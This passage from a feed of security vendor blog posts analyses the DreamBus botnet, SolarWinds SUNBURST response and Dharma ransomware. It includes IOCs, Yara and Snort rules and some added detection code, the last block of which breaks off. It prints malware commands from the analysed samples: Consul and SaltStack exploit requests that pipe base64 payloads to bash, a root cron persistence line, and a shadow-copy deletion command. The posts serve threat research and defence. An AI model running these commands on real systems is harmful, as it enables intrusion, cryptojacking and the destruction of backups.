{"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"script": "echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash","TTL": "120s"}}
```

The third registration request is identical to the first registration request, but the module replaces the TTL field with the Interval field.
```
PUT /v1/agent/service/register HTTP/1.1
Host: %s:%d
User-Agent: consul-api-c
Content-Type: application/json
Content-Length: %d

{"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"Args": ["sh","-c","echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash"],"Interval": "120s"}}
```

The fourth registration request is identical to the second registration request, with the TTL field replaced by the Interval field.

```
PUT /v1/agent/service/register HTTP/1.1
Host: %s:%d
User-Agent: consul-api-c
Content-Type: application/json
Content-Length: %d

{"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"script": "echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash","Interval": "120s"}}
```

After sending these four registration requests, the DreamBus Consul module calls the deregister command once again with the same parameters as described previously to clean itself up. HashiCorp has published an advisory about the conditions in which this vulnerability can be triggered, as well as guidance to secure a Consul instance.

DreamBus SaltStack module

The most recent DreamBus module observed by Zscaler ThreatLabZ targets SaltStack, which is a Python-based open source IT automation framework. The module exploits CVE-2020-11651, an authentication bypass that results in full remote command execution as root. This exploit was originally described by F-Secure, who found that there were 6,000 SaltStack servers exposed to the internet and therefore potentially vulnerable. The DreamBus module performs an initial check to make sure that /usr/bin/curl and /usr/bin/python3 exist on the system and are executable. If they are not present, the module will exit.
The module then scans for SaltStack servers on port 4506 on private subnets and internet ranges, sending the following request:

```
GET / HTTP/1.1
Host:
```

The module checks whether the server responds with the bytes ff 00 00 00 00 00 00 00 01 7f. These bytes are characteristic of the ZeroMQ protocol that is used by SaltStack. If successful, the module executes a series of commands. It first creates a directory under /tmp/.salted/ and writes a Base64-encoded shell script to this directory and executes it. This script performs a variety of actions. A Base64-encoded string is decoded and written to a file; this is a Python script that contains a copy of an open source proof-of-concept exploit for this vulnerability. Another shell script is created with the name x.px in the /tmp/.salted/ directory. This script contains the code to download the main DreamBus spreader from a hardcoded TOR domain with the path /st.<arch> if the exploit is successful. It also attempts to delete the files /etc/cron.d/tmp00 and /tmp/.systemd-salt. The script then writes the following cron job line to a file:

```
* * * * * root /bin/bash /tmp/.systemd-salt
```

Next, two shell commands attempt to install the Python packages msgpack and pyzmq. These packages are dependencies required by the Python-based exploit script that launches the exploit. The DreamBus module launches the exploit three times with the following command lines:

```sh
python3 -p 4506 -w /tmp/.systemd-salt -f ./x.px $1
python3 -p 4506 -w /etc/cron.d/tmp00 -f ./ $1
python3 -p 4506 -c "echo WFJBTkRPTQpleGVjICY…[snip]...G9uZQo=|base64 -d|bash" -m $1
```

The first and second commands launch the Python exploit script with the same parameters: the port number of the SaltStack server (with the -p option), the file on the Salt Master to write (with the -w option), the content of the file to write (with the -f option), and the IP address of the server to target.
The differences between the two commands are that the first command writes the content of the file x.px to /tmp/.systemd-salt, while the second command writes the content of the temporary cron job file to /etc/cron.d/tmp00. This allows DreamBus to establish persistence on the compromised SaltStack server. The third command launches the exploit script with the port, a command to execute (with the -c option), a flag to run the command on all active minions (with the -m option), and the IP address of the SaltStack server. The command consists of the same Base64 encoded content as the file x.px that downloads the main DreamBus spreader module. Finally, the Python-based exploit script, the temporary cron job file, the main Base64 encoded shell script, and x.px (the main spreader module script) are deleted to hide the exploitation.

Additional DreamBus modules

Prior open source reporting has also identified modules deployed by DreamBus that target Apache Flink and Jenkins.

DreamBus XMRig Monero miner module

The current monetization vector for DreamBus is mining the cryptocurrency Monero (XMR), which is a popular alternative to Bitcoin due to its improvements in anonymity. At the time of publication, the value of Monero is up over 100 percent in the past year, further increasing the threat actor's profits. To mine Monero, DreamBus downloads an XMRig module through the /cpu command. The XMRig module is compiled regularly with the most recent version, XMRig 6.7.1, built on January 15, 2021. The XMRig configuration specifies a mining pool and uses the infected system's CPU to mine Monero cryptocurrency.
An example hardcoded configuration is shown below:

```json
{
  "api": { "id": null, "worker-id": null },
  "http": { "enabled": false, "host": "", "port": 0, "access-token": null, "restricted": true },
  "autosave": true,
  "version": 1,
  "background": true,
  "colors": true,
  [snip]
  "cpu": {
    "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null,
    "memory-pool": false, "yield": true, "max-threads-hint": 100, "asm": true, "argon2-impl": null,
    "astrobwt-max-size": 550, "cn/0": false, "cn-lite/0": false, "kawpow": false
  },
  [snip]
  "donate-level": 5,
  "donate-over-proxy": 1,
  "log-file": null,
  "pools": [
    {
      "algo": null, "coin": "monero", "url": "", "user": "x", "pass": "x", "rig-id": null,
      "nicehash": true, "keepalive": true, "enabled": true, "tls": false, "tls-fingerprint": null,
      "daemon": false, "self-select": null
      [snip]
  ],
  "print-time": 60,
  "health-print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "user-agent": null,
  "watch": true,
  "pause-on-battery": false
}
```

Attribution

The threat actor behind DreamBus is likely located in or near Russia, based on the times at which new commands are pushed out. Updates and new commands are typically issued starting around 6:00 a.m. UTC (9:00 a.m. Moscow Standard Time, MSK) and ending at approximately 3:00 p.m. UTC (6:00 p.m. MSK).

Conclusion

While DreamBus is currently used for mining cryptocurrency, the threat actor could pivot to more disruptive activities such as ransomware. In addition, other threat groups could leverage the same techniques to infect systems and compromise sensitive information that can be stolen and easily monetized. The DreamBus threat actor continues to innovate and add new modules to compromise more systems, and regularly pushes out updates and bug fixes. The threat actor behind DreamBus is likely to continue activity for the foreseeable future, hidden behind TOR and anonymous file-sharing websites.
Therefore, organizations must be vigilant and take the necessary precautions to prevent infections. There are a number of best practices that organizations can follow to prevent attacks. These include properly securing all applications, whether publicly or privately accessible. Strong passwords should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify compromises, and be mindful of systems that engage in bruteforce attacks, which are typically very noisy.

Detections

Zscaler's multilayered cloud security platform detects indicators at various levels, as shown below:

ELF32.Coinminer.DreamBus
ELF32.Coinminer.XMRig
Linux.Worm.SSHSpreader

MITRE ATT&CK Table

| Technique ID | Technique |
| --- | --- |
| T1133 | External Remote Services |
| T1090 | Proxy |
| T1110 | Brute Force |
| T1190 | Exploit Public-Facing Application |
| T1210 | Exploitation of Remote Services |
| T1078 | Valid Accounts |
| T1552 | Unsecured Credentials |
| T1592 | Gather Victim Host Information |
| T0011 | Command and Control |
| T1053 | Scheduled Task/Job |
| T1496 | Resource Hijacking |

Indicators of Compromise (IOCs)

The following IOCs can be used to detect a DreamBus infection.
Indicators Filenames Description Main Spreader Script Main Spreader Script 0systemd-service Main Spreader Script /tmp/.X11-unix/sshd DreamBus SSH bruteforce spreader module TAR file /tmp/.X11-unix/01 DreamBus main module lock file /tmp/.X11-unix/22 DreamBus module lock file /etc/cron.d/systemdd DreamBus Redis module cron /etc/cron.d/tmp00 DreamBus SaltStack module cron /tmp/.salted/ DreamBus SaltStack exploit temporary directory /tmp/.systemd-salt DreamBus SaltStack backdoor Yara rules These rules are valid on unpacked DreamBus binaries. rule dreambus_module { strings: $ = "/tmp/.X11-unix/22" $ = "" $ = "" $ = "" condition: all of them } rule dreambus_main { strings: $ = "/tmp/.X11-unix/01" $ = "/dev/null" $ = {2D 63 00 2F 62 69 6E 2F 73 68 00} $ = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" condition: all of them } Snort rules alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Command Request"; flow:established,to_server; content:"GET"; http_method; content:"/cmd"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Command Request"; flow:established,to_server; content:"GET"; http_method; content:"/trc"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Beacon Request"; flow:established,to_server; content:"GET"; http_method; content:"/bot"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus XMRig Request"; flow:established,to_server; content:"GET"; http_method; content:"/cpu"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) Fri, 22 Jan 2021 05:00:01 -0800 Brett Stone-Gross The Four Critical Protection Points in your Cloud Attack Surface Your attack surface represents all 
of the different ways that an attacker can gain access to sensitive data and compromise applications that your organization is trying to protect. There are hundreds of different attack vectors that an attacker can leverage to gain access to an organization, everything from compromised credentials and social engineering to more advanced techniques like exploiting a zero-day vulnerability. Unfortunately for the good guys, the bad guys only need to find one weakness to exploit to make their way in, and they have hundreds of attack vectors to choose from.

The solution? Make your attack surface as small as possible, thereby limiting the number of places those attack vectors can be put to use. This strategy works as well for your public cloud deployments as it does elsewhere in your organization. There are four key components of your public cloud attack surface that should be minimized:
1. Platforms
2. Workloads
3. Inbound connectivity
4. Outbound connectivity

1. Platforms
Start by understanding the security posture of the underlying platform(s) for your cloud environment. If you’re using one of the three major cloud platforms (AWS, Azure, GCP), your concern should largely revolve around your organization’s use of these platforms rather than around security of the platforms themselves. These providers have invested heavily in security, have gone through every certification available, and their platforms have been tested by tens of thousands of organizations. What they can’t ensure, however, is that your organization has securely configured their many features and services. If you search the term “AWS S3 exposure,” you’ll find plenty of articles about enterprises that have made disastrous configuration mistakes, resulting in embarrassing and costly incidents.

To analyze your configurations, you want to start by getting a comprehensive inventory of everything across your entire cloud footprint, including IaaS, PaaS, containers, serverless, and more. Because cloud platforms are dynamic, you want continuous monitoring so that you’re always aware of changes. From there, map your inventory to the set of policies your organization has put into place to minimize the risk of exposure resulting from the insecure configuration of a cloud platform. Obviously, you don’t want to publicly expose S3/storage buckets, but there are a number of other policies you can enact that will go a long way towards eliminating your exposure to the hundreds of attack vectors mentioned earlier in this post. Finally, you want to put automatic remediation into place whenever possible. This will help ensure that, when changes occur, your configuration remains aligned to your policies.

2. Workloads
Even if you’ve properly configured the cloud platform, using identity-based workload segmentation is critical to further minimizing your attack surface and stopping lateral threat movement. This step minimizes the potential damage that attackers can cause if they do make their way in. Bad actors can wreak havoc on flat networks that allow unchecked lateral movement. But segmenting a network using the typical approach, network-based firewall policies, is unmanageably complex, leading to human error and exposed workloads. Workload-identity verification ensures that you are limiting access only to known applications and services, and you want to ensure that you’re verifying the actual software in question, down to the sub-process level. For example, it’s not enough to simply allow or block Python scripts. You want to allow the specific Python scripts that are needed to make your applications operate properly and block everything else. From there, identity-based segmentation ensures that all network paths that aren’t necessary for the proper functioning of your business applications are eliminated. The result? Only known and verified software is able to communicate, and only where it absolutely needs to communicate on approved pathways.

3. Inbound connectivity
Zero trust remote access has quickly become the preferred method for remote user connectivity, and cloud workload access is no exception. With zero trust, applications are never exposed to the internet, making them invisible to unauthorized users. Invisibility is a superpower that everyone wants, and zero trust delivers! Whether you have a privileged user managing an application with Secure Shell (SSH), or a business partner accessing a web-based application, zero trust allows you to provide access to applications, not to your network, thereby limiting potential threats from the outside. With this technique, even authorized users aren’t provided unfettered network access. They get access only to the applications they need to do their jobs, and nothing more.

4. Outbound connectivity
There are two forms of connectivity for most cloud workloads: cloud-to-internet, and cloud-to-other-clouds or private data center. Cloud workloads require internet access for a variety of reasons, including software update services and API connectivity to other applications. Unfortunately, providing direct access to the internet increases risk. Ensuring that internet access goes through a security intermediary that can scan for malware and other forms of malicious traffic can reduce the risk of an internet-based attack. Secure communication to other clouds and data centers is another important aspect of minimizing your cloud attack surface. As with user access, zero trust principles should be applied, ensuring that applications can securely connect to other applications, not networks. By eliminating open network connectivity, you can ensure that even if an application is compromised, the attacker’s ability to do damage across your cloud footprint is severely limited.
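The inventory-to-policy-to-remediation loop described under Platforms, as an added example (not Zscaler’s code or any ZCP feature). The bucket records are constructed and mirror the shape of S3 ACL, Public Access Block and default-encryption settings; the policy names, the sample bucket names and the account-owner grantee are assumptions for the illustration, and remediate() edits the in-memory record where a real deployment would call the provider API.

```python
"""Policy-as-code evaluation and auto-remediation over a cloud storage inventory.

Added example, not Zscaler's code. The inventory records are constructed; in
practice they would come from a continuous inventory feed, and remediate()
would call the cloud provider's API instead of editing a local record.
"""
from dataclasses import dataclass, field

# Real S3 group URIs that turn an ACL grant into a public one.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# The four S3 Public Access Block settings; the policy requires all of them.
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls",
            "BlockPublicPolicy", "RestrictPublicBuckets")
OWNER = "owner-canonical-id"   # constructed stand-in for the account owner


@dataclass
class Bucket:
    name: str
    grants: list                      # [{"grantee": uri_or_id, "permission": "READ"}, ...]
    public_access_block: dict = field(default_factory=dict)
    sse_enabled: bool = False         # default server-side encryption configured


@dataclass
class Finding:
    bucket: str
    policy: str
    detail: str


def check_public_acl(b):
    bad = [g for g in b.grants if g["grantee"] in PUBLIC_GRANTEES]
    if bad:
        perms = ",".join(sorted(g["permission"] for g in bad))
        return Finding(b.name, "no-public-acl", f"public grants: {perms}")
    return None


def check_public_access_block(b):
    missing = [k for k in PAB_KEYS if not b.public_access_block.get(k)]
    if missing:
        return Finding(b.name, "public-access-block", "unset: " + ",".join(missing))
    return None


def check_encryption(b):
    if not b.sse_enabled:
        return Finding(b.name, "default-encryption", "no default SSE")
    return None


POLICIES = (check_public_acl, check_public_access_block, check_encryption)


def evaluate(inventory):
    """Map every bucket to every policy; return the list of violations."""
    findings = []
    for b in inventory:
        for check in POLICIES:
            f = check(b)
            if f:
                findings.append(f)
    return findings


def remediate(bucket, finding):
    """Apply the fix for one finding (stand-in for the provider API call)."""
    if finding.policy == "no-public-acl":
        bucket.grants = [g for g in bucket.grants if g["grantee"] not in PUBLIC_GRANTEES]
    elif finding.policy == "public-access-block":
        bucket.public_access_block = {k: True for k in PAB_KEYS}
    elif finding.policy == "default-encryption":
        bucket.sse_enabled = True


def remediate_all(inventory):
    """Fix every finding, then re-evaluate; returns whatever is still open."""
    by_name = {b.name: b for b in inventory}
    for f in evaluate(inventory):
        remediate(by_name[f.bucket], f)
    return evaluate(inventory)


def build_inventory():
    """Constructed sample: one exposed bucket, one half-configured, one clean."""
    return [
        Bucket("corp-web-assets",
               grants=[{"grantee": OWNER, "permission": "FULL_CONTROL"},
                       {"grantee": "http://acs.amazonaws.com/groups/global/AllUsers",
                        "permission": "READ"}]),
        Bucket("finance-reports",
               grants=[{"grantee": OWNER, "permission": "FULL_CONTROL"}],
               public_access_block={k: True for k in PAB_KEYS}),
        Bucket("build-logs",
               grants=[{"grantee": OWNER, "permission": "FULL_CONTROL"}],
               public_access_block={k: True for k in PAB_KEYS},
               sse_enabled=True),
    ]


if __name__ == "__main__":
    inv = build_inventory()
    for f in evaluate(inv):
        print(f"{f.bucket}: {f.policy} ({f.detail})")
    print("still open after remediation:", remediate_all(inv))
```

Keeping each policy a small function that returns a Finding makes the mapping step auditable: a new rule is one more entry in POLICIES, and the remediation branch for it lives next to the check that raised it.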
Minimize your cloud attack surface with Zscaler Cloud Protection
Zscaler Cloud Protection (ZCP) was designed from the ground up to minimize the attack surface and take the complexity out of securing your cloud footprint. The result is tighter security with lower costs and dramatically reduced complexity. Contact us to learn more or to schedule a custom demo of Zscaler Cloud Protection.

Tue, 05 Jan 2021 08:00:02 -0800 Rich Campagna

The Hitchhiker’s Guide to SolarWinds Incident Response
On December 13, 2020, multiple security vendors, in conjunction with CISA, disclosed a software supply-chain attack involving the SolarWinds Orion platform. The disclosure detailed the activities of an advanced persistent threat (APT) adversary that was able to gain access to SolarWinds systems to create trojanized updates to the Orion platform between March 2020 and possibly as recently as December 2020. The trojanized updates included a custom, digitally signed backdoor called SUNBURST. SolarWinds Orion is a widely used network infrastructure monitoring and management platform with a reported customer base of over 18,000. The following versions may be affected:
Orion Platform 2019.4 HF5, version 2019.4.5200.9083
Orion Platform 2020.2 RC1, version 2020.2.100.12219
Orion Platform 2020.2 RC2, version 2020.2.5200.12394
Orion Platform 2020.2 and 2020.2 HF1, version 2020.2.5300.12432

At this time, the full scope of the attack remains under investigation. What is known is that the attack was executed by a truly sophisticated adversary with a deep understanding of operational security and complex tradecraft. Based on publicly available data, this adversary demonstrated significant efforts to evade, obfuscate, and clean up, using techniques such as steganography, fingerprinting to identify both target systems and analysis systems, rotating infrastructure with a focus on geolocation proximity, and executing code in memory as much as possible.
These techniques, in combination with using a digitally signed component of a trusted software platform as the initial infection vector, are indicative of a highly skilled and covert adversary willing to expend resources to assure the success of their operation. Zscaler suggests that all organizations take the immediate actions described below, in addition to reviewing the existing security policies and best practices available to Zscaler customers. These actions are recommended for any organization that may be impacted by the SolarWinds event. They are not intended to be a comprehensive guide to all actions that an organization may take, and each organization should perform its own due diligence to assess impact and risk.

Investigation
Organizations should immediately identify all systems that may have SolarWinds Orion installed. Once the systems are identified, the version should be checked against the list of impacted versions. Depending on the version(s) installed, additional responses may be required. Even if a version is not found on the impacted version list, it may be prudent to perform cursory checks to confirm there is no impact to the organization. If an affected version of Orion is found, that system should be immediately taken offline and all network traffic blocked inbound and outbound. Any system or user accounts associated with the affected system should be disabled and reviewed for legitimacy as well as access. If possible, a forensic image of the affected system should also be collected; because this adversary executed code in memory wherever possible, capture a memory image before the host is powered down, since a disk image alone can miss the in-memory stages.

Network activity
Based on public reporting, a SolarWinds Orion system affected by this event, meaning that the SUNBURST backdoor had been successfully installed, would begin network communication to its first-stage command and control (C&C) server at avsvmcloud[.]com. While this activity does indicate that the affected system was within the target radius of the attack, it does not confirm additional compromise or post-exploitation actions.
Zscaler Internet Access (ZIA) customers may be able to perform this search within the DNS Insights or Web Insights area in the portal, or within the log aggregator/SIEM of choice where ZIA logs are sent. This data will, however, be limited to systems that have their network traffic routed to ZIA. The following network indicators may be used to perform a sweep for a timeframe extending back to March 2020 or further to discover possibly compromised systems (note: additional indicators may be discovered as additional data is disclosed).

Domains
avsvmcloud[.]com
digitalcollege[.]org
freescanonline[.]com
deftsecurity[.]com
thedoccloud[.]com
websitetheme[.]com
highdatabase[.]com
incomeupdate[.]com
databasegalore[.]com
panhardware[.]com
zupertech[.]com
seobundlekit[.]com
lcomputers[.]com
virtualdataserver[.]com
webcodez[.]com
infinitysoftwares[.]com
ervsystem[.]com
bigtopweb[.]com (added 1/20/21 in relation to RainDrop)

IPs
All other internet-bound destinations from the Orion system should also be examined. Additionally, all network activity originating from SolarWinds Orion systems to other internal systems should be reviewed for potential lateral movement. This may prove challenging, as most Orion deployments likely allow it privileged access across the network to a variety of systems. However, it may be possible to carve out a smaller set of data to analyze initially by suppressing known-good or expected behaviors from the potentially affected Orion system.

Endpoint
The SUNBURST backdoor is a digitally signed DLL file with a specific filename and hash. The existence of this file on an Orion server indicates that the adversary was able to gain unauthorized access to the system. Additional post-exploitation behaviors may have been performed by the adversary, indicating a successful intrusion. The following indicators and behaviors may assist in confirming a compromise.
MD5 hashes
b91ce2fa41029f6955bff20079468448
d5aad0d248c237360cf39c054b654d69
2c4a910a1299cdae2a4e55988a2f102e
846e27a652a5e1bfbd0ddd38a16dc865

Filename
SolarWinds.Orion.Core.BusinessLayer.dll

Behaviors
Modification of system tasks
delete-create-execute-delete-create directory action pattern
Newly created or unknown local user accounts
Existence or evidence of usage of Adfind.exe
Signs of cmd.exe or rundll32.exe spawned from solarwinds.businesslayerhost.exe
Existence of unknown and/or very broad email forwarding/deleting rules on the email gateway

User account activity
Once SUNBURST has been deployed, the adversary will most likely begin to perform reconnaissance using the privileges of the Orion system and explore what additional assets are available to compromise or what actions can be taken. The following behaviors may have been observed on the affected Orion system or on other systems that have communicated with it.
Anomalous logins or repeated failed authentication to internal systems
Logins from unknown or unrecognized external sources to internal systems
Extremely long-duration tokens, which may indicate malicious activity (examine SAML tokens for duration)

Zscaler is here to help
As described in our ThreatLabZ blog post, Zscaler immediately deployed protections to all customers and continues to deploy additional protections and countermeasures as more information becomes available. In addition, as we disclosed in our Trust Advisory, Zscaler was not impacted by this event.
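A sweep over the network and endpoint indicators listed above, as an added example (not Zscaler’s code and not a ZIA feature). The proxy-log lines and process-creation events are constructed, and their field layout (epoch time, client IP, destination host, URL path; host, parent image, child image) is an assumption, so the parsers must be adapted to the ZIA export or SIEM search result you actually have. The domain list and MD5 hashes are the ones published above.

```python
"""Sweep for the SUNBURST network and endpoint indicators from the post.

Added example, not Zscaler's code. The proxy-log lines and process events
below are constructed; the log format (epoch, client IP, destination host,
URL path) is invented, so adapt the parsers to your own log export.
"""
import hashlib

DEFANGED_DOMAINS = [
    "avsvmcloud[.]com", "digitalcollege[.]org", "freescanonline[.]com",
    "deftsecurity[.]com", "thedoccloud[.]com", "websitetheme[.]com",
    "highdatabase[.]com", "incomeupdate[.]com", "databasegalore[.]com",
    "panhardware[.]com", "zupertech[.]com", "seobundlekit[.]com",
    "lcomputers[.]com", "virtualdataserver[.]com", "webcodez[.]com",
    "infinitysoftwares[.]com", "ervsystem[.]com", "bigtopweb[.]com",
]
SUNBURST_MD5 = {
    "b91ce2fa41029f6955bff20079468448", "d5aad0d248c237360cf39c054b654d69",
    "2c4a910a1299cdae2a4e55988a2f102e", "846e27a652a5e1bfbd0ddd38a16dc865",
}
SUNBURST_DLL = "solarwinds.orion.core.businesslayer.dll"
ORION_HOST_PROCESS = "solarwinds.businesslayerhost.exe"
SUSPECT_CHILDREN = {"cmd.exe", "rundll32.exe"}


def refang(domain):
    """Turn the defanged form used in reports back into a matchable name."""
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = [refang(d) for d in DEFANGED_DOMAINS]


def domain_matches(host, ioc):
    """True for the IOC itself or any subdomain of it, never for look-alikes
    such as notavsvmcloud.com. Subdomain matching matters here because the
    first-stage beacons go to generated subdomains of avsvmcloud.com."""
    host = host.lower().rstrip(".")
    return host == ioc or host.endswith("." + ioc)


def sweep_proxy_log(lines, iocs=IOC_DOMAINS):
    """Return (timestamp, client, destination, matched_ioc) for every hit."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue                      # constructed format: ts client dst path
        ts, client, dst, _path = parts[:4]
        for ioc in iocs:
            if domain_matches(dst, ioc):
                hits.append((ts, client, dst, ioc))
                break
    return hits


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_sunburst_dll(filename, data):
    """Endpoint check: the published filename and one of the published MD5s."""
    return basename(filename) == SUNBURST_DLL and hashlib.md5(data).hexdigest() in SUNBURST_MD5


def orion_spawned_shells(events):
    """events: (host, parent_image, child_image). Flags cmd.exe/rundll32.exe
    spawned by the Orion business-layer host, one of the behaviours above."""
    return [e for e in events
            if basename(e[1]) == ORION_HOST_PROCESS and basename(e[2]) in SUSPECT_CHILDREN]


# Constructed sample data (not from any real incident).
PROXY_LOG = [
    "1590000000 10.1.2.3 02ab3c.appsync-api.eu-west-1.avsvmcloud.com /",
    "1590000001 10.1.2.3 www.microsoft.com /",
    "1590000002 10.1.2.4 notavsvmcloud.com /",
    "1590000003 10.1.2.3 deftsecurity.com /",
]
PROCESS_EVENTS = [
    ("orion01", r"C:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe",
     r"C:\Windows\System32\cmd.exe"),
    ("ws05", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for hit in sweep_proxy_log(PROXY_LOG):
        print("network hit:", hit)
    for ev in orion_spawned_shells(PROCESS_EVENTS):
        print("suspicious child process:", ev)
    print("DLL match:", is_sunburst_dll("SolarWinds.Orion.Core.BusinessLayer.dll", b"not the real dll"))
```

A hit on avsvmcloud.com places the host inside the attack’s target radius, as the post says; it is the child-process and DLL-hash checks, together with the account-activity review, that move a host from "received the update" to "was worked on by the adversary".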
This may, however, be an opportunity for organizations to reassess their security policies and confirm alignment with the documented best practices and recommended policies described in our documentation, which cover recommendations such as:
Enable SSL inspection where possible | SSL Best Practice Guide
Enable Advanced Threat Protection (ATP) and its associated features | Recommended Policy
Enable Advanced Cloud Sandbox with AI-Driven Quarantine | Recommended Policy
Enable Advanced Cloud Firewall with Cloud IPS | Recommended Policy
Enable Cloud Browser Isolation where possible | About Cloud Browser Isolation
Restrict access to specific URL categories with legitimate business use cases | Recommended Policy
Restrict access to specific file types with legitimate business use cases | Recommended Policy
Configure DNS Control | About DNS Control

Request your complimentary SolarWinds security assessment
Zscaler has your back. Engage with our security experts to gain insight into the SolarWinds attacks and get hands-on best-practices guidance to better protect your users, applications, and systems.

Tue, 22 Dec 2020 17:32:32 -0800 Bryan Lee

Ransomware Delivered Using RDP Brute-Force Attack
Zscaler ThreatLabZ recently published a report on the 2020 State of Public Cloud Security that showed security misconfiguration to be the leading cause of cyberattacks against public cloud infrastructure. In this blog, we will look at one of the commonly abused security misconfigurations, the RDP service port left open to the internet, and how cybercriminals abuse it. Brute-forcing RDP (Remote Desktop Protocol) is the most common method used by threat actors attempting to gain access to Windows systems and execute malware. The reason is simple: in our public cloud threat research, we have observed that 70 percent of systems keep RDP ports open in the public cloud. Threat actors scan for these publicly open RDP ports to conduct distributed brute-force attacks.
Systems that use weak credentials are easy targets, and, once compromised, attackers sell access to the hacked systems on the dark web to other cybercriminals. Ransomware groups such as SamSam and Dharma have been spreading almost exclusively via RDP for years. In this case study, we will look at Dharma ransomware attacks. Dharma, also known as Crysis, has been distributed under a ransomware-as-a-service (RaaS) model since 2016. Its source code was put up for sale in March 2020, making it available to a wider range of actors.

Infection chain
Attackers use open-source port-scanning tools to scan for exposed RDP ports online and then try to gain access to a system using brute-force tools or stolen credentials purchased on the dark web. After attackers gain access to the target system, they go on to make the system more vulnerable by deleting backups, disabling antivirus software, and changing configuration settings. Once the security is disabled and the network is vulnerable, attackers deliver malware payloads. The process involves installing ransomware, using infected machines to distribute spam, deploying keyloggers, or installing backdoors to be used for future attacks. The figure below shows the infection cycle of Dharma ransomware delivered via an RDP brute-force attack.

Figure 1: Infection chain of an RDP brute-force attack delivering Dharma ransomware

Once the attacker gains access to the machine, the following files are uploaded:
%temp%\ns.exe – network enumeration/scanning tool
%programfiles%\process hacker\ – Process Hacker tool

ns.exe is a network enumeration and scanning tool used by attackers to scan SMB shares, open ports, and services through which they can move within the network. Process Hacker is a program used mostly by system administrators for monitoring, debugging, and troubleshooting, but in this case it was used for malicious purposes such as disabling AV or services. Following this pre-execution stage, the attacker uploads the ransomware file and executes it.
Technical details
Once executed, this variant of Dharma ransomware uses the commands below to quietly delete all of the shadow volume copies on the machine (the first command switches the console to code page 1251, Cyrillic, before the deletion):
mode con cp select=1251
vssadmin delete shadows /all /quiet
Exit

For persistence, the ransomware does the following:
Copies itself to %windir%\system32 or %appdata% and adds a value under HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run
Copies itself to the ‘Startup’ folder
Copies itself to the ‘Common Startup’ folder

The ransomware encrypts files with the following extensions:
Figure 2: File extensions to encrypt

The ransomware encrypts files using AES-256. The AES key is in turn encrypted with RSA-1024, and this encrypted AES key is stored at the end of the encrypted file along with the original filename. Encrypted files are named with the following pattern:
[Filename].id-{8 bytes ID}.[recovery_email].zimba
Figure 3: Encrypted files

After encrypting the files, the ransomware displays two different ransom notes on the victim’s computer. One is the Info.hta file, which is launched via autorun when a user logs into the computer.
Figure 4: info.hta
The other note is called FILES ENCRYPTED.txt and can be found on the desktop.
Figure 5: FILES ENCRYPTED.txt

Lateral movement
Dharma ransomware uses typical methods for obtaining credentials and propagating laterally within a network. In most cases, the operators use the Mimikatz tool to dump credentials from memory, including those used for network shares, and in other cases they use NirSoft CredentialsFileView, which recovers passwords stored in Windows credential files. The obtained credentials are used to attempt lateral movement inside on-prem as well as public cloud infrastructure. In some cases, the ransomware is spread through the network by taking advantage of a compromised Domain Controller and deploying a Default Domain Policy that runs the ransomware payload at startup on each machine.
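Detection logic for the chain described above (brute-force burst, successful RDP logon, shadow-copy deletion, Run-key persistence), as an added example that is not Zscaler’s code. It runs over constructed Windows event records shaped like the fields a SIEM extracts from Security events 4625/4624 (failed/successful logon), 4688 (process creation) and Sysmon event 13 (registry value set); the source IPs, timestamps, threshold and the Run value name are assumptions for the illustration.

```python
"""Detections for the RDP brute-force -> Dharma chain, run over constructed events.

Added example, not Zscaler's code. Each event is a dict with the fields a SIEM
would extract; the records in build_events() are invented.
"""
import re
from collections import defaultdict

# vssadmin is the deletion command shown above. "mode con cp select=1251" that
# precedes it is benign on its own, so the process-level rule keys on vssadmin.
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
# Failed RDP logons through NLA are recorded with logon type 3; without NLA,
# and for the eventual interactive session, type 10.
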